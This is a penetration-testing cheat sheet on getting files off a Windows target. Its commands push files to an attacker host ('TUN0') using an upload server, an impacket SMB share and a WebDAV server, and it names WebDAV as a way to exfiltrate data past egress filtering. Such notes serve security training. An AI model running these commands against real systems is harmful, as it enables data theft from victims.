Target: Windows

File Hash

Always verify the MD5 checksum of a file on both the target and attack hosts after transfer to ensure it wasn't corrupted or altered. It's a good habit for file integrity checks.

# Bash
md5sum filename

# PowerShell
Get-FileHash filename -Algorithm MD5

# Cmd
certutil -hashfile filename MD5

Transfer Techniques

Base64 Encode & Decode

[Convert]::ToBase64String((Get-Content -path "C:\Windows\Public\Desktop\filename" -Encoding byte))

# Keep the base64 string in a file
cat base64_string_file | base64 -d > filename

Python Upload Server

# Start Upload Server
python3 -m uploadserver

# To use upload operation from powershell, we need to use PSUpload.ps1
# https://github.com/juliourena/plaintext/blob/master/Powershell/PSUpload.ps1
# Transfer PSUpload.ps1 to Target using fileless method (easier)
# Then use it's cmdlets
Invoke-FileUpload -Uri http://TUN0:8000/upload -File C:\Windows\Public\Desktop\filename

# Create a smb server
python3 /opt/impacket/build/scripts-3.12/smbserver.py share -smb2support .

copy filename \\TUN0\share

WebDAV Method

Most companies only allow outbound HTTP (port 80) or HTTPS (port 443) traffic. Because of this, using SMB shares directly is often blocked. While it may work in some rare cases, a better alternative is using WebDAV, which allows SMB-like file sharing over HTTP/HTTPS. WebDAV enables a web server to function like a file server, making it useful for data exfiltration or remote file access in restricted environments.

wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous

copy C:\Windows\Public\Desktop\filename \\TUN0\DavWWWRoot\

File Hash​

Transfer Techniques​

Base64 Encode & Decode​

Python Upload Server​

SMB Share Methods​

WebDAV Method​

File Hash

Transfer Techniques

Base64 Encode & Decode

Python Upload Server

SMB Share Methods

WebDAV Method